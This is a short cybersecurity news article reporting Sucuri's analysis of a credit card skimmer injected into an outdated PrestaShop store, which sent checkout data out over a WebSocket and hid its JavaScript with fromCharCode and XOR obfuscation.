Card Skimmer Exploits PrestaShop GTAG WebSocket to Steal User Banking Data

Published on August 15, 2024
Written by:
Lore Apostol
Lore Apostol
Cybersecurity & Streaming Writer

A threat actor was seen exploiting a PrestaShop GTAG Web socket connection to exfiltrate an online store’s customer credit card information, as per the latest analysis coming from the Sucuri security experts. The card stealer infection triggered an antivirus warning, which is typical in these cases.

In the studied case, the compromised website’s source code had an obfuscated JavaScript code added at the bottom of the page, but searching for the found strings returned nothing.

Credit card skimming malware needs to load on the checkout page, so it’s often injected into core CMS files, theme files, certain areas of the database, or malicious WooCommerce WordPress plugins.

PrestaShop Skimming
Image Source: Sucuri

The attackers used the WebSocket for obfuscation, which ensures continuous traffic between the client and the server in both directions simultaneously and hid the skimmer in “autoload.php” in the config subdirectory “config.inc.php” file.

The JavaScript code that gets injected and executed in the victim’s browser during the checkout process uses fromCharCode to avoid detection, adding the XOR simple obfuscation technique to shift the string's values.

Injected Skimmer Code PrestaShop
Image Source: Sucuri

The victim held an old version of the CMS platform, as the online store used the PrestaShop 1.7.4.2 version, which was released in 2018. Meanwhile, tens of common vulnerabilities and exposures have been published, leaving the website defenseless against potential attackers.

PrestaShop is in the top 10 most common eCommerce solutions for online stores, used by just above 1% of all websites, which amounts to north of 60,000 shops.

In June, a new variation of the “gtag” credit card skimming attacks security researchers called Caesar Cipher Skimmer impacted almost 80 sites in the first two weeks after its discovery, deployed to several different CMS platforms, infecting WordPress, Magento, and OpenCart.



For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: